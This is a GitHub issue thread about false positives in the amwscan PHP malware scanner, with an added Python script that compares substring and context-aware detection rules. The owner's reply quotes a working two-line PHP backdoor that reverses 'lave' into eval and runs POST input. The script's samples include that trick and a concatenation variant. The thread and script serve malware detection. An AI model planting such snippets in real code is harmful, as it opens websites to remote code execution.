too many false positives. #80

Closed
oantonioo opened this issue Apr 11, 2023 · 1 comment

Comments

@oantonioo

It is impossible to use this scanner.
Is any word with 'eval' or 'lave' malware?
And many more like this. I have wasted half an hour scanning and reviewing, and they are all false positives.

@marcocesarato (Owner)

It is not uncommon for antivirus software to flag legitimate code as malware due to certain strings or patterns, such as the presence of "eval" or "lave". As such, before classifying the flagged code as malware, it's essential to scrutinize it carefully and comprehend its purpose.

For this, the software offers different aggression levels, as provided in the documentation. Depending on the scanned code, you can use php amwscan --only-signatures or php amwscan --only-exploits to reduce the number of false positives.

Examples of eval malware:

https://github.com/marcocesarato/PHP-Malware-Collection/blob/b23b4a3106caadf85e6e897b2db0b38c451b2b82/real/ice.php#LL1C1-L1C33


The code below reverses the string "eval" to create the variable name "$b" and then uses it to execute any code provided via POST request. This can be a potential security risk as it allows arbitrary code execution.

<?php
// "lave" reversed is "eval"; the function name only exists at runtime, so a
// plain search for "eval(" in the source never sees it
$b = strrev("lave");
// variable function call: eval() is run on attacker-controlled POST data,
// i.e. unauthenticated remote code execution
$b($_POST['evilcode']);
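The two comments above describe the same trade-off from opposite sides: a substring signature on "eval"/"lave" catches the reversed-eval trick but also fires on words like "slave" or "evaluate", while a narrower pattern has to know what the malicious construct actually looks like. The small scanner below is an added illustration of that trade-off and is not amwscan's code or its signature set; the regexes and the PHP snippets it runs over are constructed here for the example.

```python
import re

# Constructed sample PHP snippets (not taken from any real site or malware collection).
SAMPLES = {
    "benign_word": '<?php $role = "slave"; echo $role;',
    "benign_eval_in_comment": '<?php // do not evaluate user input here',
    "benign_strrev": '<?php echo strrev("hello");',
    "direct_eval": '<?php eval($_POST["c"]);',
    # the reversed-eval trick quoted in the reply above
    "reversed_eval": '<?php $b = strrev("lave"); $b($_POST["evilcode"]);',
    # same idea built by concatenation: neither "eval" nor "lave" appears as a substring
    "concat_eval": '<?php $f = "ev" . "al"; $f($_POST["x"]);',
}

# Naive signature: any occurrence of the substring, the behaviour the issue complains about.
NAIVE = re.compile(r"eval|lave", re.IGNORECASE)

# Narrower, context-aware signatures (hypothetical; not amwscan's rules):
# 1. eval used as a call, not as part of another word
DIRECT_EVAL = re.compile(r"\beval\s*\(")
# 2. strrev() applied to the literal "lave", i.e. the reversed-eval construction
REVERSED_EVAL = re.compile(r"""strrev\s*\(\s*["']lave["']\s*\)""")
# 3. a variable function call ($x(...)) whose first argument is request input
VAR_CALL_ON_INPUT = re.compile(r"""\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b""")


def naive_scan(code: str) -> bool:
    """True if the substring signature fires anywhere in the code."""
    return bool(NAIVE.search(code))


def contextual_scan(code: str) -> list:
    """Return the list of narrower rule names that match the code."""
    hits = []
    if DIRECT_EVAL.search(code):
        hits.append("direct-eval")
    if REVERSED_EVAL.search(code):
        hits.append("reversed-eval")
    if VAR_CALL_ON_INPUT.search(code):
        hits.append("variable-call-on-request-input")
    return hits


def compare(samples: dict) -> dict:
    """Run both scanners over every sample: name -> (naive flagged?, contextual hits)."""
    return {name: (naive_scan(code), contextual_scan(code)) for name, code in samples.items()}


if __name__ == "__main__":
    for name, (naive, hits) in compare(SAMPLES).items():
        print(f"{name:24s} naive={naive!s:5s} contextual={hits}")
```

Running it shows the substring rule flagging three benign snippets and missing the concatenation variant entirely, while the contextual rules flag only the three snippets that actually execute request input. Rule 3 is what makes the difference in practice: it keys on the dangerous behaviour (a dynamically named function called on a superglobal) rather than on how the name "eval" was spelled, so it survives the reversal and concatenation tricks alike.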
